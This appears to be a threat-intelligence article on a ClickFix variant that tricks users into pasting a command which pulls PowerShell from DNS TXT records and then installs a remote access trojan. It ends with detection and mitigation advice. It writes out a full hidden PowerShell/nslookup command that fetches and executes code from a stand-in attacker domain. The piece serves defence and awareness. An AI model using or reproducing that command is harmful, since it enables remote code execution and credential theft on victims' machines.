ClickFix Evolution: DNS-Based Malware Staging via nslookup
Microsoft Threat Intelligence has disclosed a sophisticated evolution of the ClickFix social engineering tactic. In this new variant, attackers have moved away from traditional HTTP-based payload delivery, opting instead to use the Domain Name System (DNS) as a lightweight staging and signaling channel. By tricking users into executing a native nslookup command, threat actors can pull malicious PowerShell scripts directly from DNS TXT records, effectively bypassing most web-based security filters.
The Social Engineering Lure: "The Fix is In"
The attack begins with a familiar ClickFix premise: a user encounters a compromised website that displays a simulated error. Common lures include:
- Fake Browser Crashes: A "CrashFix" popup claiming the browser has encountered a fatal error.
- Incomplete CAPTCHAs: A prompt stating that "Verification failed" and requires a manual terminal fix.
- Google Meet/Zoom Glitches: An alert claiming microphone or headset drivers are missing.
The victim is then instructed to press Win + R, paste a command from their clipboard (which was automatically copied by the malicious site), and press Enter. This "self-infection" model remains the hallmark of the ClickFix strategy, turning the user into the initial access vector.
Technical Breakdown: The nslookup Mechanism
In previous versions, the copied command would typically use mshta or PowerShell to reach out to a malicious URL (e.g., https://attacker[.]com/payload.ps1). The new 2026 variant is more evasive.
1. The Initial Command
The command pasted into the Windows Run dialog now looks similar to this:
powershell.exe -W Hidden -C "IEX (nslookup -q=txt payload.attacker-dns[.]com 8.8.8.8 | Select-String -Pattern '\"' | ForEach-Object { $_.ToString().Trim('\"') })"
2. DNS TXT Records as Dead Drops
The nslookup command queries a specific TXT record on a domain controlled by the attacker. DNS TXT records are designed to hold arbitrary text for verification purposes, but here they contain Base64-encoded PowerShell code.
3. Bypassing System Resolvers
Notably, the command often specifies an external DNS server (like Google's 8.8.8.8 or Cloudflare's 1.1.1.1) rather than using the system's default internal resolver. This allows the attacker to reach their infrastructure directly and avoid internal DNS logging or filtering that might block "Newly Registered Domains" (NRDs) at the enterprise level.
Post-Exploitation: Deploying ModeloRAT
Once the PowerShell payload is retrieved from the DNS response and executed in memory, it typically performs a series of environment checks. If the system is identified as high-value (e.g., domain-joined), the script proceeds to download the final payload: ModeloRAT.
ModeloRAT is a Python-based Remote Access Trojan that offers:
- Stealth Execution: Uses
pythonw.exeto run without a console window. - Credential Harvesting: Specifically targets browser wallet extensions and local session tokens.
- Persistence: Installs a scheduled task named "SoftwareProtection" to re-infect the system every five minutes.
Comparison: HTTP vs. DNS Staging
| Feature | Standard ClickFix (HTTP) | New Variant (DNS/nslookup) |
|---|---|---|
| Primary Tool | mshta.exe / curl |
nslookup.exe |
| Payload Storage | Remote Web Server | DNS TXT Records |
| Visibility | Visible in Web Proxy logs | Blends with background DNS noise |
| Detection Barrier | URL Reputation / Blocklists | Bypasses URL filtering entirely |
Defense and Mitigation
Security teams should move beyond simple URL blocking to defend against this "Living Off the Web" technique:
- Restrict PowerShell: Implement Constrained Language Mode and monitor for
EncodedCommandorIEX(Invoke-Expression) strings in command-line logs. - DNS Monitoring: Monitor for an unusual volume of TXT record queries or
nslookupprocesses communicating directly with public DNS providers (8.8.8.8, etc.) instead of your internal DNS. - Endpoint Protection (EDR): Flag any instance of the Windows Run dialog (
explorer.exe) spawningpowershell.exeorcmd.exedirectly.
